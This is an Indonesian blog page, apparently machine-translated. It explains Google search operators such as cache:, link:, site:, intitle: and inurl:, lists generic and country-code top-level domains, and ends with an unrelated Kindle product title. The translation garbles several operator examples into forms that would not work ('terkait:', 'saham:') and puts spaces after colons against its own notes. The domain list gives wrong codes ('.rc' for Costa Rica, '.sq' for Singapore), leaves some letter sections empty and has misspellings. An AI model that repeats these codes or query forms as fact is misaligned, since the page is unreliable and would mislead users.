Beberapa operator lebih umum menggunakan tanda baca bukan kata-kata, atau tidak memerlukan titik dua. Di antara operator OR, "" (operator kutipan), - (operator minus), dan + (operator plus). Informasi lebih lanjut mengenai jenis operator tersedia pada dasar dari halaman Pencarian. Banyak dari operator khusus dapat diakses dari halaman Advanced Search, namun ada juga yang tidak. Di bawah ini adalah daftar semua operator khusus Google mendukung.

Alternatif jenis query

cache:
Jika Anda termasuk kata-kata yang lain dalam pencariannya, Google akan menyoroti kata-kata dalam dokumen cache. Misalnya, [cache: www.google.com web] akan menampilkan isi cache dengan "web" kata disorot.
Fungsi ini juga dapat diakses dengan mengklik link "Cached" pada halaman hasil utama Google.
The [cache:] query akan menampilkan versi dari halaman web yang Google telah dalam cache. Misalnya, [cache: www.google.com] akan menampilkan cache Google dari situs Google. Catatan tidak boleh ada spasi antara "cache:" dan url halaman web.


link:
The [link:] query akan menampilkan halaman web yang memiliki link ke halaman web tertentu. Misalnya, [link: www.google.com] akan menampilkan halaman web yang memiliki link yang menunjuk ke homepage Google. Catatan tidak boleh ada spasi antara "link:" dan url halaman web.
Fungsi ini juga dapat diakses dari halaman Advanced Search, di bawah Halaman Pencarian> Khusus Link


related:
Query [related:] akan mencantumkan halaman web yang "mirip" ke halaman web tertentu. Misalnya, [terkait: www.google.com] akan mencantumkan halaman web yang serupa dengan homepage Google. Catatan ada bisa tidak ada ruang antara "yang terkait:" dan url halaman web.
Fungsi ini juga dapat diakses dengan mengklik link "Halaman Serupa" pada halaman hasil utama Google, dan dari halaman Advanced Search, di bawah> Halaman Pencarian Spesifik serupa.


info:
The [info:] query akan menampilkan beberapa informasi bahwa Google memiliki sekitar bahwa halaman web. Misalnya, [info: www.google.com] akan menampilkan informasi tentang situs Google. Catatan tidak boleh ada spasi antara "info:" dan url halaman web.
Fungsi ini juga dapat diakses dengan mengetikkan url halaman web langsung ke kotak pencarian Google.

Other information needs

define:
Query [define:] akan memberikan definisi dari kata-kata yang Anda masukkan setelah itu, dikumpulkan dari berbagai sumber online. Definisi ini akan menjadi untuk seluruh frase dimasukkan (misalnya, itu akan mencakup semua kata dalam urutan yang tepat Anda ketik mereka).


stocks:
Jika Anda memulai query dengan [stocks:] operator, Google akan memperlakukan sisa istilah permintaan sebagai simbol ticker saham, dan akan link ke halaman menampilkan informasi saham bagi mereka simbol. Misalnya, [saham: yhoo intc] akan menampilkan informasi tentang Intel dan Yahoo. (Catatan Anda harus mengetikkan simbol ticker, bukan nama perusahaan.)
Fungsi ini juga tersedia jika Anda mencari hanya pada simbol saham (misalnya [intc yhoo]) dan kemudian klik pada "stock Tampilkan tanda kutip" link pada halaman hasil.



Query modifiers

site:
Jika Anda termasuk [site:] dalam permintaan Anda, Google akan membatasi hasil untuk situs-situs dalam domain yang diberikan. Sebagai contoh, [help site: www.google.com] akan menemukan halaman tentang bantuan dalam www.google.com. [Help site: com] akan menemukan halaman tentang bantuan dalam URL com.. Catatan tidak boleh ada spasi antara "site:" dan domain.
Pencarian Lanjutan halaman, di bawah Advanced Search Web Domain>.


allintitle:
Jika Anda memulai sebuah query dengan [allintitle:], Google akan membatasi hasil kepada mereka dengan semua kata query dalam judul. Misalnya, [allintitle: search google] akan menemukan dokumen hanya yang memiliki keduanya "google" dan "pencarian" dalam judul.
Pencarian Lanjutan halaman, di bawah Advanced Search Web Kemunculan>.


intitle:
Jika Anda termasuk [intitle:] dalam permintaan Anda, Google akan membatasi hasil untuk dokumen yang berisi bahwa kata dalam judul. Misalnya, [intitle: search google] akan menemukan dokumen yang menyebutkan kata "google" dalam judul mereka, dan menyebutkan kata "search" di mana saja dalam dokumen (judul atau tidak). Catatan tidak boleh ada spasi antara "intitle:" kata dan berikut.
Puting [intitle:] di depan setiap kata dalam permintaan Anda adalah setara dengan menempatkan [allintitle:] di depan query Anda: [intitle: intitle google: pencarian] adalah sama seperti [allintitle: pencarian google].


allinurl:
Jika Anda memulai sebuah query dengan [allinurl:], Google akan membatasi hasil kepada mereka dengan semua kata query di url. Misalnya, [allinurl: search google] akan menemukan dokumen hanya yang memiliki keduanya "google" dan "search" di url.
Perhatikan bahwa [allinurl:] komponen bekerja pada kata-kata, bukan url. Secara khusus, mengabaikan tanda baca. Jadi, [allinurl: foo / bar] akan membatasi hasil ke halaman dengan "foo" kata-kata dan "bar" dalam url, tetapi tidak akan memerlukan bahwa mereka dipisahkan dengan garis miring dalam url itu, bahwa mereka akan berdekatan, atau bahwa mereka berada dalam urutan kata tertentu. Saat ini tidak ada cara untuk menegakkan kendala.
Pencarian Lanjutan halaman, di bawah Advanced Search Web Kemunculan>.


inurl:
Jika Anda termasuk [inurl:] dalam permintaan Anda, Google akan membatasi hasil untuk dokumen yang berisi kata dalam url. Misalnya, [inurl: search google] akan menemukan dokumen yang menyebutkan kata "google" di url mereka, dan menyebutkan kata "search" di mana saja dalam dokumen (url atau tidak). Catatan tidak boleh ada spasi antara "inurl:" dan kata berikut.
Puting "inurl:" di depan setiap kata dalam permintaan Anda adalah setara dengan meletakkan "allinurl:" di depan Anda query: [inurl: google inurl: search] adalah sama seperti [allinurl: search google].

NAMA-NAMA DOMAIN DAN NEGARANYA

Posted by Administrator Wednesday, February 09, 2011, under , | No comments

DOMAIN UMUM

.com
Commercial
.edu Educational
.gov US Government
.int International Organizations
.mil
US Dept of Defense
.net Networks
.org Organizations

A

.ac Ascension Island
.ad Andorra
.ae United Arab Emirates
.af Afghanistan
.ag
.ai Anguilla
.al Albania
.am Armenia
.an Netherlands Antilles
.ao Angola
.aq Antarctica
.ar Argentina
.as American Samoa
.at Austria
.au Australia
.aw Aruba
.az Azerbaijan

B

.ba Bosnia and Herzegowina
.bb Barbados
.bd Bangladesh
.be Belgium
.bf Burkina Faso
.bg Bulgaria
.bh Bahrain
.bi Burund
.bj Benin
.bm Bermuda
.bn Brunei Darussalam
.bo Bolivia
.br Brazil
.bs Bahamas
.bt Bhutan
.bv Bouvet Island
.bw Botswana
.by Belarus
.bz Belize

C

.ca Canada
.cc Cocos (Keeling) Islands
.cd Zaire
.cf Central African Republic
.cg Congo
.ch Switzerland
.ci Côte d'Ivoire
.ck Cook Islands
.cl Chile
.cm Cameroon
.cn China
.co Colombia
.rc Costa Rica
.cs Czechoslovakia (former - non-existing)
.cu Cuba
.cv Cape Verde
.cx Christmas Island
.cy Cyprus
.cz Czech Republic

D

.de Germany
.dj Djibouti
.dk Denmark
.dm Dominica
.do Dominican Republic
.dz Algeria

E

.ec Ecuador
.ee Estonia
.eg Egypt
.eh Western Sahara
.er Eritrea
.es Spain
.et Ethiopia

F

.fi Finland
.fj Fiji
.fk Falkland Islands
.fm Micronesia
.fo Faroe Islands
.fr France
.fx France, Metropolitan

G

.ga Gabon
.gb United Kingdom
.gd Grenada
.ge Georgia
.gf French Guiana
.gg Guernsey
.gh Ghana
.gi Gibraltar
.gl Greenland
.gm Gambia
.gn Guinea
.gp Guadelope
.gq Equatorial Guinea
.gr Greece
.gs South Georgia and the South Sandwich Islands
.gt Guatemala
.gu Guam
.gw Guinea-Bissau
.gy Guyana

H

.hk Hong Kong
.hm Heard and McDonald Islands
.hn Honduras
.hr Croatia
.ht Haiti
.hu Hungary

I

.id Indonesia
.ie Ireland
.il Israel
.im Isle of Man
.in India
.io British Indian Ocean Territory
.iq Iraq
.ir Iran
.is Iceland
.it Italy

J

.je Jersey
.jm Jamaica
.jo Jordan
.jp Japan

K

.ke Kenya
.kg Kyrgystan
.kh Cambodia
.ki Kiribati
.km Komoros
.kn Saint Kitts and Nevis
.kp Korea, Democratic People's Republic of
.kr Korea, Republic of
.kw Kuwait
.ky Cayman Islands
.kz Kazakhstan

L


M

.ma Moroco
.mc Monaco
.md Moldova
.mg Madagascar
.mh Marshall Islands
.mk Macedonia
.ml Mali
.mm Myanmar
.mn Mongolia
.mo Macau
.mp Northern Mariana Islands
.mq Martinique
.mr Mauritania
.ms Montserrat
.mt Malta
.mu Mauritius
.mv Maldives
.mw Malawi
.mx Mexico
.my Malaysia
.mz Mozambique

N

.na Nambia
.nc New Caledonia
.ne Niger
.nf Norfolk Island
.ng Nigeria
.ni Nicaragua
.nl The Netherlands
.no Norway
.np Nepal
.nr Nauru
.nt Neutral Zone
.nu Niue
.nz New Zealand

O

.om Oman

P

.pa Panama
.pe Peru
.pf French Polynesia
.pg Papua New Guinea
.ph Philippines
.pk Pakistan
.pl Poland
.pm St. Pierre and Miquelon
.pn Pitcairn
.pr Puerto Rico
.pt Portugal
.pw Palau
.py Paraguay

Q

.qa Qatar


R

.re Reunion
.ro Romania
.ru Russia
.rw Rwanda

S

.sa Saudi Arabia
.sb Solomon Islands
.sc Seychelles
.sd Sudan
.se Sweden
.sq Singapore
.sh St. Helena
.si Slovenia
.sj Svalbard and Jan Mayen Islands
.sk Slovakia
.sl Sierra Leone
.sm San Marino
.sn Senegal
.so Somalia
.sr Surinam
.st Sao Tome and Principe
.su USSR (former)
.sv El Salvador
.sy Syrian Arab Republic
.sz Swaziland

T

.tc The Turks & Caicos Islands
.td Chad
.tf French Southern Territories
.tg Togo
.th Tahiland
.tj Tajikistan
.tk Tokelau
.tm Turkmenistan
.tn Tunisia
.to Tonga
.tp East Timor
.tr Turkey
.tt Trinidad and Tobago
.tv Tuvalu
.tw Taiwan
.tz Tanzania

U

.ua Ukraine
.ug Uganda
.uk United Kingdom
.um United States Minor Outlying Islands
.us United States
.uy Uruguay
.uz Uzbekistan

V


W


Y

.ye Yemen
.yt Mayotte
.yu Yugoslavia

Z

.za South Africa
.zm Zambia
.zr Zaire
.zw Zimbabwe
Kindle Wireless Reading Device, Wi-Fi, Graphite, 6" Display with New E Ink Pearl TechnologyRed (Special Edition)